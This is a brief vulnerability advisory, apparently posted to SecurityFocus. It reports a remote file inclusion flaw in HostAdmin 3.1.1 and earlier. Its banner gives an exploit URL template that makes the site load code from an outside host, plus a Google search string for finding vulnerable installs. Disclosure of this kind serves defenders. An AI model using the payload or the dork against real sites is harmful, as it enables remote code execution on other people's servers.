Dear securityfocus moderator, a bug in HostAdmin that allows to us to occur a Remote File Include on a Remote machin. this bug tested with the Vulnerable Software 3.1.1. A Full Description Can be found in the attached document. ############################################################################### # # # Islamic Republic Of Iran Security Team # # # # Www.IrIsT.Ir # # # ############################################################################### # # # HostAdmin <== 3.1.1 Remote File Include Vulnerabilities # # # # Download......: http://dreamcost.com/?page=hostadmin # # # # Bug Found.....: IrIsT? # # # # discovery.....: Am!r (IrIsT?) # # # # contact.......: Admin[at]IrIsT.ir # # # # Exploit.......: http://[site]/[path]/index.php?path=[Site]? # # # # Google Search.: "Powered By HostAdmin" # # # # SP TNX........: Dr.Flag & bl4ck-h4t-b0ys # # # ###############################################################################
